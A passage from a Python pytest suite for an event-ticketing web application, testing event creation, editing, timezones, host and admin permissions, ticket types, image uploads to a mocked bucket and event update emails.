f' <a href="https://127.0.0.1/dashboard/events/{event_id}/"><span>View Event</span></a>\n'
f'</div>\n'
)
async def test_create_private_all_day(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await login()
data = dict(
name='foobar',
category=factory.category_id,
public=False,
location={'lat': 50, 'lng': 0, 'name': 'London'},
date={'dt': datetime(2032, 2, 1, 19, 0).strftime('%s'), 'dur': None},
timezone='Europe/London',
long_description='I love to party',
)
r = await cli.json_post(url('event-add'), data=data)
assert r.status == 201, await r.text()
assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
public, start_ts, duration = await db_conn.fetchrow('SELECT public, start_ts, duration FROM events')
assert public is False
assert start_ts == datetime(2032, 2, 1, 0, 0, tzinfo=timezone.utc)
assert duration is None
async def test_create_event_duplicate_slug(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await login()
data = dict(
name='foobar',
category=factory.category_id,
long_description='I love to party',
timezone='Europe/London',
date={'dt': datetime(2032, 2, 1, 19, 0).strftime('%s'), 'dur': 3600},
)
assert 0 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
r = await cli.json_post(url('event-add'), data=data)
assert r.status == 201, await r.text()
assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
r = await cli.json_post(url('event-add'), data=data)
assert r.status == 201, await r.text()
assert 2 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
slug1, slug2 = [r[0] for r in await db_conn.fetch('SELECT slug FROM events ORDER BY id')]
assert slug1 == 'foobar'
assert slug2 == RegexStr(r'foobar\-[A-Za-z0-9]{4}')
async def test_create_event_host(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user(role='host')
await login()
await db_conn.fetchval("UPDATE users SET status='pending'")
data = dict(
name='foobar',
category=factory.category_id,
long_description='I love to party',
timezone='Europe/London',
date={'dt': datetime(2032, 2, 1, 19, 0).strftime('%s'), 'dur': 3600},
)
r = await cli.json_post(url('event-add'), data=data)
assert r.status == 201, await r.text()
assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
status = await db_conn.fetchval('SELECT status FROM events')
assert status == 'pending'
async def test_create_timezone(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await login()
data = dict(
name='foobar',
category=factory.category_id,
location={'lat': 50, 'lng': 0, 'name': 'London'},
date={'dt': datetime(2032, 6, 1, 19, 0).isoformat(), 'dur': 7200},
timezone='America/New_York',
long_description='# title\nI love to **party**',
)
r = await cli.json_post(url('event-add'), data=data)
assert r.status == 201, await r.text()
assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
data = await r.json()
start_ts, tz = await db_conn.fetchrow('SELECT start_ts, timezone FROM events WHERE id=$1', data['pk'])
assert tz == 'America/New_York'
assert start_ts == datetime(2032, 6, 1, 23, 0, tzinfo=timezone.utc)
async def test_create_external_ticketing(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await login()
data = dict(
name='foobar',
category=factory.category_id,
location={'lat': 50, 'lng': 0, 'name': 'London'},
date={'dt': datetime(2032, 6, 1, 19, 0).isoformat(), 'dur': 7200},
external_ticket_url='https://www.example.com/the-test-event/',
timezone='America/New_York',
long_description='# title\nI love to **party**',
)
r = await cli.json_post(url('event-add'), data=data)
assert r.status == 201, await r.text()
assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
data = await r.json()
external_ticket_url = await db_conn.fetchval('SELECT external_ticket_url FROM events WHERE id=$1', data['pk'])
assert external_ticket_url == 'https://www.example.com/the-test-event/'
cat_slug, event_slug = await db_conn.fetchrow(
'SELECT cat.slug, e.slug FROM events e JOIN categories cat on e.category = cat.id WHERE e.id=$1', data['pk']
)
r = await cli.get(url('event-get-public', category=cat_slug, event=event_slug))
assert r.status == 200, await r.text()
data = await r.json()
assert data['event']['external_ticket_url'] == 'https://www.example.com/the-test-event/'
async def test_create_event_host_external_ticketing(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user(role='host')
await login()
await db_conn.fetchval("UPDATE users SET status='pending'")
data = dict(
name='foobar',
category=factory.category_id,
long_description='I love to party',
timezone='Europe/London',
date={'dt': datetime(2032, 2, 1, 19, 0).strftime('%s'), 'dur': 3600},
external_ticket_url='https://www.example.com/the-test-event/',
)
r = await cli.json_post(url('event-add'), data=data)
assert r.status == 403, await r.text()
data = await r.json()
assert data == {'message': 'external_ticket_url may only be set by admins'}
assert 0 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
async def test_create_external_donations(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await login()
data = dict(
name='foobar',
category=factory.category_id,
long_description='longgggg descriptionnnn',
date={'dt': datetime(2032, 2, 1, 19, 0).strftime('%s'), 'dur': 3600},
timezone='America/New_York',
external_donation_url='https://www.example.com/give-monies-now/',
)
r = await cli.json_post(url('event-add'), data=data)
assert r.status == 201, await r.text()
assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
j = await r.json()
external_donation_url = await db_conn.fetchval('SELECT external_donation_url FROM events WHERE id=$1', j['pk'])
assert external_donation_url == data['external_donation_url']
cat_slug, event_slug = await db_conn.fetchrow(
'SELECT cat.slug, e.slug FROM events e JOIN categories cat on e.category = cat.id WHERE e.id=$1', j['pk']
)
r = await cli.get(url('event-get-public', category=cat_slug, event=event_slug))
j = await r.json()
assert r.status == 200, await r.text()
assert j['event']['external_donation_url'] == data['external_donation_url']
async def test_create_event_host_external_donations(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user(role='host')
await login()
await db_conn.fetchval("UPDATE users SET status='pending'")
data = dict(
name='foobar',
category=factory.category_id,
long_description='longgggg descriptionnnn',
date={'dt': datetime(2032, 2, 1, 19, 0).strftime('%s'), 'dur': 3600},
timezone='America/New_York',
external_donation_url='https://www.example.com/give-monies-now/',
)
r = await cli.json_post(url('event-add'), data=data)
j = await r.json()
assert r.status == 403, await r.text()
assert j == {'message': 'external_donation_url may only be set by admins'}
assert 0 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
async def test_create_bad_timezone(cli, url, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await login()
data = dict(
name='foobar',
category=factory.category_id,
date={'dt': datetime(2032, 6, 1, 19, 0).strftime('%s'), 'dur': 7200},
timezone='foobar',
long_description='# title\nI love to **party**',
)
r = await cli.json_post(url('event-add'), data=data)
assert r.status == 400, await r.text()
data = await r.json()
assert data == {
'message': 'Invalid Data',
'details': [{'loc': ['timezone'], 'msg': 'invalid timezone', 'type': 'value_error'}],
}
async def test_not_auth(cli, url, db_conn, factory: Factory):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
data = dict(
name='foobar',
category=factory.category_id,
location={'lat': 50, 'lng': 0, 'name': 'London'},
date={'dt': datetime(2032, 2, 1, 19, 0).strftime('%s'), 'dur': None},
long_description='I love to party',
)
r = await cli.json_post(url('event-add'), data=data)
assert r.status == 401, await r.text()
assert 0 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
async def test_edit_event(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await login()
ticket_limit, location_lat = await db_conn.fetchrow('SELECT ticket_limit, location_lat FROM events')
assert ticket_limit is None
assert location_lat is None
data = dict(ticket_limit=12, location={'name': 'foobar', 'lat': 50, 'lng': 1})
r = await cli.json_post(url('event-edit', pk=factory.event_id), data=data)
assert r.status == 200, await r.text()
assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
ticket_limit, location_lat = await db_conn.fetchrow('SELECT ticket_limit, location_lat FROM events')
assert ticket_limit == 12
assert location_lat == 50
allow_tickets, allow_donations = await db_conn.fetchrow('SELECT allow_tickets, allow_donations FROM events')
assert (allow_tickets, allow_donations) == (True, False)
action = await db_conn.fetchrow("SELECT * FROM actions WHERE type='edit-event'")
assert action['user_id'] == factory.user_id
assert action['event'] == factory.event_id
async def test_edit_event_date(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await login()
start_ts = await db_conn.fetchval('SELECT start_ts FROM events')
assert start_ts == datetime(2032, 6, 28, 18, 0, tzinfo=timezone.utc)
data = dict(date={'dt': datetime(2032, 1, 1, 12).isoformat(), 'dur': 3600})
r = await cli.json_post(url('event-edit', pk=factory.event_id), data=data)
assert r.status == 200, await r.text()
start_ts = await db_conn.fetchval('SELECT start_ts FROM events')
assert start_ts == datetime(2032, 1, 1, 12, tzinfo=timezone.utc)
async def test_edit_event_timezone(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await login()
start_ts, tz = await db_conn.fetchrow('SELECT start_ts, timezone FROM events')
assert start_ts == datetime(2032, 6, 28, 18, 0, tzinfo=timezone.utc)
start_ts_local = await db_conn.fetchval('SELECT start_ts AT TIME ZONE timezone FROM events')
assert start_ts_local == datetime(2032, 6, 28, 19, 0)
assert tz == 'Europe/London'
data = dict(timezone='America/New_York')
r = await cli.json_post(url('event-edit', pk=factory.event_id), data=data)
assert r.status == 200, await r.text()
start_ts, tz = await db_conn.fetchrow('SELECT start_ts, timezone FROM events')
assert start_ts == datetime(2032, 6, 28, 23, 0, tzinfo=timezone.utc)
assert tz == 'America/New_York'
start_ts_local = await db_conn.fetchval('SELECT start_ts AT TIME ZONE timezone FROM events')
assert start_ts_local == datetime(2032, 6, 28, 19, 0)
async def test_edit_event_ticket_limit(cli, url, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event(ticket_limit=20)
await login()
anne = await factory.create_user(first_name='x', email='anne@example.org')
ben = await factory.create_user(first_name='x', email='ben@example.org')
await factory.book_free(await factory.create_reservation(anne, ben), anne)
r = await cli.json_post(url('event-edit', pk=factory.event_id), data=dict(ticket_limit=1))
assert r.status == 400, await r.text()
data = await r.json()
assert data['details'][0]['msg'] == 'May not be less than the number of tickets already booked.'
async def test_edit_past_event(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user(role='host')
await factory.create_event()
await login()
r = await cli.json_post(url('event-edit', pk=factory.event_id), data=dict(ticket_limit=12))
assert r.status == 200, await r.text()
assert 12 == await db_conn.fetchval('SELECT ticket_limit FROM events')
assert 1 == await db_conn.fetchval("SELECT COUNT(*) FROM actions WHERE type='edit-event'")
await db_conn.execute("UPDATE events SET start_ts=now() - '1 hour'::interval")
r = await cli.json_post(url('event-edit', pk=factory.event_id), data=dict(ticket_limit=100))
assert r.status == 404, await r.text()
assert 12 == await db_conn.fetchval('SELECT ticket_limit FROM events')
assert 1 == await db_conn.fetchval("SELECT COUNT(*) FROM actions WHERE type='edit-event'")
async def test_set_event_status(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await login()
assert 'pending' == await db_conn.fetchval('SELECT status FROM events')
r = await cli.json_post(url('event-set-status', id=factory.event_id), data=dict(status='published'))
assert r.status == 200, await r.text()
assert 'published' == await db_conn.fetchval('SELECT status FROM events')
async def test_set_event_status_bad(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await login()
assert 'pending' == await db_conn.fetchval('SELECT status FROM events')
r = await cli.json_post(url('event-set-status', id=factory.event_id), data=dict(status='foobar'))
assert r.status == 400, await r.text()
data = await r.json()
assert data == {
'message': 'Invalid Data',
'details': [
{
'loc': ['status'],
'msg': "value is not a valid enumeration member; permitted: 'pending', 'published', 'suspended'",
'type': 'type_error.enum',
'ctx': {'enum_values': ['pending', 'published', 'suspended']},
},
],
}
assert 'pending' == await db_conn.fetchval('SELECT status FROM events')
async def test_set_event_status_host_not_active(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user(role='host')
await factory.create_event()
await login()
await db_conn.execute("UPDATE users SET status='pending'")
r = await cli.json_post(url('event-set-status', id=factory.event_id), data=dict(status='published'))
assert r.status == 403, await r.text()
data = await r.json()
assert data == {'message': 'Host not active'}
assert 'pending' == await db_conn.fetchval('SELECT status FROM events')
async def test_set_event_status_missing_event(cli, url, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await login()
r = await cli.json_post(url('event-set-status', id=999), data=dict(status='published'))
assert r.status == 404, await r.text()
async def test_set_event_status_wrong_host(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user(role='host')
user2 = await factory.create_user(role='host', email='user2@example.org')
await factory.create_event(host_user_id=user2)
await login()
r = await cli.json_post(url('event-set-status', id=factory.event_id), data=dict(status='published'))
assert r.status == 403, await r.text()
data = await r.json()
assert data == {'message': 'user is not the host of this event'}
assert 'pending' == await db_conn.fetchval('SELECT status FROM events')
async def test_event_tickets_host(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user(role='host')
await factory.create_event(price=10)
user2_id = await factory.create_user(first_name='guest', last_name='guest', email='guest@example.org', role='guest')
res = await factory.create_reservation(user2_id)
await factory.buy_tickets(res)
await login()
anne = await factory.create_user(first_name='anne', last_name='anne', email='anne@example.org')
await db_conn.execute('insert into waiting_list (event, user_id) values ($1, $2)', factory.event_id, anne)
r = await cli.get(url('event-tickets', id=factory.event_id))
assert r.status == 200, await r.text()
data = await r.json()
ticket_id = await db_conn.fetchval('SELECT id from tickets')
assert data == {
'tickets': [
{
'id': ticket_id,
'ticket_id': RegexStr(r'.{7}-%s' % ticket_id),
'ticket_status': 'booked',
'extra_info': None,
'booked_at': CloseToNow(delta=4),
'booking_type': 'buy-tickets',
'price': 10,
'extra_donated': None,
'guest_user_id': user2_id,
'guest_name': None,
'buyer_user_id': user2_id,
'buyer_name': 'guest guest',
'ticket_type_name': 'Standard',
'ticket_type_id': await db_conn.fetchval('SELECT id from ticket_types'),
},
],
'waiting_list': [{'added_ts': CloseToNow(delta=4), 'name': 'anne anne'}],
'donations': [],
}
await db_conn.execute('update tickets set price=null')
r = await cli.get(url('event-tickets', id=factory.event_id))
assert r.status == 200, await r.text()
data = await r.json()
assert len(data['tickets']) == 1
assert data['tickets'][0]['price'] is None
async def test_event_tickets_admin(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
anne = await factory.create_user(first_name='x', email='anne@example.org')
ben = await factory.create_user(first_name='x', email='ben@example.org')
await factory.book_free(await factory.create_reservation(anne, ben), anne)
await db_conn.execute(
"UPDATE tickets SET first_name='anne', last_name='apple', extra_donated=1.23 WHERE user_id=$1", anne
)
await db_conn.execute(
"UPDATE tickets SET first_name='ben', last_name='banana', extra_donated=1.23 WHERE user_id=$1", ben
)
await login()
charlie = await factory.create_user(first_name='charlie', last_name='charlie', email='charlie@example.org')
await db_conn.execute('insert into waiting_list (event, user_id) values ($1, $2)', factory.event_id, charlie)
r = await cli.get(url('event-tickets', id=factory.event_id))
assert r.status == 200, await r.text()
data = await r.json()
assert len(data['tickets']) == 2
tickets = sorted(data['tickets'], key=lambda t: t['guest_name'])
tt_id = await db_conn.fetchval('SELECT id from ticket_types')
assert tickets == [
{
'id': await db_conn.fetchval("SELECT id FROM tickets where first_name='anne'"),
'ticket_id': RegexStr(r'.{7}-\d+'),
'ticket_status': 'booked',
'extra_info': None,
'booked_at': CloseToNow(delta=4),
'booking_type': 'book-free-tickets',
'price': None,
'extra_donated': 1.23,
'guest_user_id': anne,
'guest_name': 'anne apple',
'guest_email': 'anne@example.org',
'buyer_user_id': anne,
'buyer_name': 'anne apple',
'buyer_email': 'anne@example.org',
'ticket_type_name': 'Standard',
'ticket_type_id': tt_id,
},
{
'id': await db_conn.fetchval("SELECT id FROM tickets where first_name='ben'"),
'ticket_id': RegexStr(r'.{7}-\d+'),
'ticket_status': 'booked',
'extra_info': None,
'booked_at': CloseToNow(delta=4),
'booking_type': 'book-free-tickets',
'price': None,
'extra_donated': 1.23,
'guest_user_id': ben,
'guest_name': 'ben banana',
'guest_email': 'ben@example.org',
'buyer_user_id': anne,
'buyer_name': 'anne apple',
'buyer_email': 'anne@example.org',
'ticket_type_name': 'Standard',
'ticket_type_id': tt_id,
},
]
assert data['waiting_list'] == [
{'added_ts': CloseToNow(delta=4), 'name': 'charlie charlie', 'email': 'charlie@example.org'}
]
async def test_tickets_dont_repeat(cli, url, db_conn, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user(first_name='T', last_name='B', email='ticket.buyer@example.org')
await factory.create_event(status='published', price=10)
await login(email='ticket.buyer@example.org')
data = {
'tickets': [
{'t': True, 'email': 'ticket.buyer@example.org'},
{'t': True, 'email': 'ticket.buyer@example.org'},
],
'ticket_type': factory.ticket_type_id,
}
r = await cli.json_post(url('event-reserve-tickets', id=factory.event_id), data=data)
assert r.status == 200, await r.text()
action_id = (await r.json())['action_id']
await factory.fire_stripe_webhook(action_id)
assert 2 == await db_conn.fetchval('select count(*) from tickets')
r = await cli.get(url('event-tickets', id=factory.event_id))
assert r.status == 200, await r.text()
data = await r.json()
assert len(data['tickets']) == 2
async def test_image_existing(cli, url, factory: Factory, db_conn, login, dummy_server):
await factory.create_company()
await factory.create_cat()
await factory.create_user(role='host')
await factory.create_event()
await login()
assert dummy_server.app['log'] == []
r = await cli.json_post(
url('event-set-image-existing', id=factory.event_id),
data={'image': 'https://testingbucket.example.org/testing.png'},
)
assert r.status == 200, await r.text()
assert 'https://testingbucket.example.org/testing.png' == await db_conn.fetchval('SELECT image FROM events')
assert dummy_server.app['log'] == []
async def test_image_existing_past(cli, url, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user(role='host')
await factory.create_event(start_ts=datetime(2000, 1, 1))
await login()
r = await cli.json_post(
url('event-set-image-existing', id=factory.event_id),
data={'image': 'https://testingbucket.example.org/testing.png'},
)
assert r.status == 403, await r.text()
assert {'message': "you can't modify past events"} == await r.json()
async def test_image_existing_bad(cli, url, factory: Factory, db_conn, login, dummy_server):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await login()
r = await cli.json_post(
url('event-set-image-existing', id=factory.event_id), data={'image': 'https://foobar.example.org/testing.png'}
)
assert r.status == 400, await r.text()
assert None is await db_conn.fetchval('SELECT image FROM events')
assert dummy_server.app['log'] == []
async def test_image_existing_wrong_host(cli, url, factory: Factory, db_conn, login, dummy_server):
await factory.create_company()
await factory.create_cat()
await factory.create_user(role='host')
user_id = await factory.create_user(email='admin@example.org')
await factory.create_event(host_user_id=user_id)
await login()
r = await cli.json_post(
url('event-set-image-existing', id=factory.event_id),
data={'image': 'https://testingbucket.example.org/testing.png'},
)
assert r.status == 403, await r.text()
assert None is await db_conn.fetchval('SELECT image FROM events')
data = await r.json()
assert data == {'message': 'user is not the host of this event'}
assert dummy_server.app['log'] == []
async def test_image_existing_wrong_id(cli, url, factory: Factory, login, dummy_server):
await factory.create_company()
await factory.create_user()
await login()
r = await cli.json_post(
url('event-set-image-existing', id=1), data={'image': 'https://testingbucket.example.org/testing.png'}
)
assert r.status == 404, await r.text()
assert dummy_server.app['log'] == []
async def test_image_existing_delete(cli, url, factory: Factory, db_conn, login, dummy_server):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event(image='https://testingbucket.example.org/main.png')
await login()
r = await cli.json_post(
url('event-set-image-existing', id=factory.event_id),
data={'image': 'https://testingbucket.example.org/testing.png'},
)
assert r.status == 200, await r.text()
assert 'https://testingbucket.example.org/testing.png' == await db_conn.fetchval('SELECT image FROM events')
assert set(dummy_server.app['log']) == {
'DELETE aws_endpoint_url/testingbucket.example.org/main.png',
'DELETE aws_endpoint_url/testingbucket.example.org/thumb.png',
}
async def test_image_new(cli, url, factory: Factory, db_conn, login, dummy_server):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event(image='https://testingbucket.example.org/main.png')
await login()
data = FormData()
data.add_field('image', create_image(), filename='testing.png', content_type='application/octet-stream')
r = await cli.post(
url('event-set-image-new', id=factory.event_id),
data=data,
headers={
'Referer': f'http://127.0.0.1:{cli.server.port}/foobar/',
'Origin': f'http://127.0.0.1:{cli.server.port}',
},
)
assert r.status == 200, await r.text()
img_path = await db_conn.fetchval('SELECT image FROM events')
assert img_path == RegexStr(
r'https://testingbucket.example.org/tests/testing/' r'supper-clubs/the-event-name/\w+/main.png'
)
# debug(dummy_server.app['log'])
assert sorted(dummy_server.app['log']) == [
'DELETE aws_endpoint_url/testingbucket.example.org/main.png',
'DELETE aws_endpoint_url/testingbucket.example.org/thumb.png',
RegexStr(
r'PUT aws_endpoint_url/testingbucket.example.org/tests/testing/supper-clubs/'
r'the-event-name/\w+?/main.png'
),
RegexStr(
r'PUT aws_endpoint_url/testingbucket.example.org/tests/testing/supper-clubs/'
r'the-event-name/\w+?/thumb.png'
),
]
async def test_add_ticket_type(cli, url, factory: Factory, db_conn, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await login()
assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM ticket_types where mode=$1', 'ticket')
r = await cli.get(url('event-ticket-types', id=factory.event_id))
assert r.status == 200, await r.text()
data = await r.json()
ticket_types = [data['ticket_types'][0]]
assert len(ticket_types) == 1
ticket_types.append({'name': 'Foobar', 'price': 123.5, 'slots_used': 2, 'active': False, 'mode': 'ticket'})
r = await cli.json_post(url('update-event-ticket-types', id=factory.event_id), data={'ticket_types': ticket_types})
assert r.status == 200, await r.text()
ticket_types = [dict(r) for r in await db_conn.fetch('SELECT * FROM ticket_types WHERE mode=$1', 'ticket')]
assert ticket_types == [
{
'id': AnyInt(),
'event': factory.event_id,
'name': 'Standard',
'price': None,
'mode': 'ticket',
'slots_used': 1,
'active': True,
'custom_amount': False,
},
{
'id': AnyInt(),
'event': factory.event_id,
'name': 'Foobar',
'price': Decimal('123.50'),
'mode': 'ticket',
'slots_used': 2,
'active': False,
'custom_amount': False,
},
]
async def test_delete_ticket_type(cli, url, factory: Factory, db_conn, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await login()
tt_id = await db_conn.fetchval('SELECT id FROM ticket_types')
data = {'ticket_types': [{'name': 'xxx', 'price': 12.3, 'slots_used': 50, 'active': True}]}
r = await cli.json_post(url('update-event-ticket-types', id=factory.event_id), data=data)
assert r.status == 200, await r.text()
ticket_types = [dict(r) for r in await db_conn.fetch('SELECT * FROM ticket_types where mode=$1', 'ticket')]
assert ticket_types == [
{
'id': AnyInt(),
'event': factory.event_id,
'name': 'xxx',
'price': Decimal('12.30'),
'slots_used': 50,
'mode': 'ticket',
'active': True,
'custom_amount': False,
},
]
assert ticket_types[0]['id'] != tt_id
async def test_delete_wrong_ticket_type(cli, url, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await factory.create_reservation()
await login()
data = {'ticket_types': [{'name': 'xxx', 'price': 12.3, 'slots_used': 50, 'active': True}]}
r = await cli.json_post(url('update-event-ticket-types', id=factory.event_id), data=data)
assert r.status == 400, await r.text()
data = await r.json()
assert data == {
'message': 'ticket types deleted which have ticket associated with them',
}
async def test_edit_ticket_type(cli, url, factory: Factory, db_conn, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await login()
tt_id = await db_conn.fetchval('SELECT id FROM ticket_types')
data = {'ticket_types': [{'id': tt_id, 'name': 'xxx', 'price': 12.3, 'slots_used': 50, 'active': True}]}
r = await cli.json_post(url('update-event-ticket-types', id=factory.event_id), data=data)
assert r.status == 200, await r.text()
ticket_types = [dict(r) for r in await db_conn.fetch('SELECT * FROM ticket_types where mode=$1', 'ticket')]
assert ticket_types == [
{
'id': tt_id,
'event': factory.event_id,
'name': 'xxx',
'price': Decimal('12.30'),
'mode': 'ticket',
'slots_used': 50,
'active': True,
'custom_amount': False,
},
]
@pytest.mark.parametrize(
'get_input,response_contains',
[
(lambda tt_id: [{'id': tt_id, 'name': 'foobar'}], '"msg": "field required"'),
(
lambda tt_id: [{'id': 999, 'name': 'x', 'slots_used': 1, 'active': True}],
'"message": "wrong ticket updated"',
),
(
lambda tt_id: [{'id': tt_id, 'name': 'x', 'slots_used': 1, 'active': False}],
'"msg": "at least 1 ticket type must be active"',
),
],
)
async def test_invalid_ticket_updates(get_input, response_contains, cli, url, factory: Factory, db_conn, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await login()
tt_id = await db_conn.fetchval("SELECT id FROM ticket_types where mode='ticket'")
ticket_types = get_input(tt_id)
r = await cli.json_post(url('update-event-ticket-types', id=factory.event_id), data={'ticket_types': ticket_types})
assert r.status == 400, await r.text()
assert response_contains in await r.text()
async def test_event_updates_sent(cli, url, login, factory: Factory, dummy_server):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event(price=10)
await login()
anne = await factory.create_user(first_name='anne', email='anne@example.org')
await factory.buy_tickets(await factory.create_reservation(anne, None))
assert len(dummy_server.app['emails']) == 1
data = dict(subject='This is a test email & whatever', message='this is the **message**.')
r = await cli.json_post(url('event-send-update', id=factory.event_id), data=data)
assert r.status == 200, await r.text()
assert len(dummy_server.app['emails']) == 2
r = await cli.get(url('event-updates-sent', id=factory.event_id))
assert r.status == 200, await r.text()
data = await r.json()
assert data == {
'event_updates': [
{
'message': 'this is the **message**.',
'subject': 'This is a test email & whatever',
'ts': CloseToNow(delta=4),
}
]
}
async def test_event_updates_past(cli, url, login, factory: Factory, dummy_server, db_conn):
await factory.create_company()
await factory.create_cat()
await factory.create_user(role='host')
await factory.create_event()
await login()
anne = await factory.create_user(first_name='anne', email='anne@example.org')
await factory.book_free(await factory.create_reservation(anne, None), anne)
data = dict(subject='This is a test email & whatever', message='this is the **message**.')
r = await cli.json_post(url('event-send-update', id=factory.event_id), data=data)
assert r.status == 200, await r.text()
assert len(dummy_server.app['emails']) == 1
r = await cli.json_post(url('event-send-update', id=factory.event_id), data=data)
assert r.status == 200, await r.text()
assert len(dummy_server.app['emails']) == 2
await db_conn.execute("UPDATE events SET start_ts=now() - '1 hour'::interval")
r = await cli.json_post(url('event-send-update', id=factory.event_id), data=data)
assert r.status == 403, await r.text()
assert {'message': "you can't modify past events"} == await r.json()
assert len(dummy_server.app['emails']) == 2
async def test_send_event_update_wrong_user(cli, url, login, factory: Factory):
await factory.create_company()
await factory.create_cat()
await factory.create_user(role='host')
user2 = await factory.create_user(role='host', email='user2@example.org')
await factory.create_event(price=10, host_user_id=user2)
await login()
data = dict(subject='This is a test email & whatever', message='this is the **message**.')
r = await cli.json_post(url('event-send-update', id=factory.event_id), data=data)
assert r.status == 403, await r.text()
async def test_send_event_update_no_event(cli, url, login, factory: Factory):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await login()
data = dict(subject='This is a test email & whatever', message='this is the **message**.')
r = await cli.json_post(url('event-send-update', id=999), data=data)
assert r.status == 404, await r.text()
async def test_event_updates_none(cli, url, login, factory: Factory):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await login()
r = await cli.get(url('event-updates-sent', id=factory.event_id))
assert r.status == 200, await r.text()
data = await r.json()
assert data == {'event_updates': []}
async def test_event_updates_wrong_event(cli, url, login, factory: Factory):
await factory.create_company()
await factory.create_cat()
await factory.create_user(role='host')
user2 = await factory.create_user(role='host', email='user2@example.org')
await factory.create_event(price=10, host_user_id=user2)
await login()
r = await cli.get(url('event-updates-sent', id=factory.event_id))
assert r.status == 403, await r.text()
@pytest.mark.parametrize('previous_status', [True, False])
async def test_event_switch_status(previous_status, cli, url, login, factory: Factory, db_conn):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event(price=10)
await login()
await db_conn.execute('UPDATE events SET highlight=$1', previous_status)
r = await cli.json_post(url('event-switch-highlight', id=factory.event_id))
assert r.status == 200, await r.text()
h = await db_conn.fetchval('SELECT highlight FROM events')
assert h == (not previous_status)
async def test_delete_event(cli, url, factory: Factory, login, db_conn):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await login()
await factory.create_reservation()
event2 = await factory.create_event(slug='event2')
ticket_type = await db_conn.fetchval('SELECT id FROM ticket_types WHERE event=$1', event2)
await factory.create_reservation(event_id=event2, ticket_type_id=ticket_type)
assert 2 == await db_conn.fetchval('SELECT count(*) FROM events')
assert 6 == await db_conn.fetchval('SELECT count(*) FROM ticket_types')
assert 2 == await db_conn.fetchval('SELECT count(*) FROM tickets')
r = await cli.json_post(url('event-delete', pk=factory.event_id))
assert r.status == 200, await r.text()
assert 1 == await db_conn.fetchval('SELECT count(*) FROM events')
assert 3 == await db_conn.fetchval('SELECT count(*) FROM ticket_types')
assert 1 == await db_conn.fetchval('SELECT count(*) FROM tickets')
async def test_delete_event_host(cli, url, factory: Factory, login, db_conn):
await factory.create_company()
await factory.create_cat()
await factory.create_user(role='host')
await factory.create_event()
await login()
await factory.create_reservation()
assert 1 == await db_conn.fetchval('SELECT count(*) FROM events')
r = await cli.json_post(url('event-delete', pk=factory.event_id))
assert r.status == 403, await r.text()
assert 1 == await db_conn.fetchval('SELECT count(*) FROM events')
async def test_secondary_image(cli, url, factory: Factory, db_conn, login, dummy_server):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event()
await login()
data = FormData()
data.add_field('image', create_image(), filename='testing.png', content_type='application/octet-stream')
r = await cli.post(
url('event-set-image-secondary', id=factory.event_id),
data=data,
headers={
